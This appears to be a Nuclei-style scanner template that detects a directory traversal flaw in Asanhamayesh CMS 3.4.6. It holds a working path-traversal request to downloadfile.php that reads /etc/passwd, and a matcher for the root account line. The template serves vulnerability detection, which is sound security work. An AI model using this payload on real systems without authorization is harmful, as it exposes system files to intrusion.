id: asanhamayesh-lfi

info:
  name: Asanhamayesh CMS 3.4.6 Directory traversal Vulnerability
  author: 0x_Akoko
  severity: high
  reference:
    - https://cxsecurity.com/issue/WLB-2018030006
    - https://asanhamayesh.com
  tags: asanhamayesh,lfi,traversal

requests:
  - method: GET
    path:
      - "{{BaseURL}}/downloadfile.php?file=../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
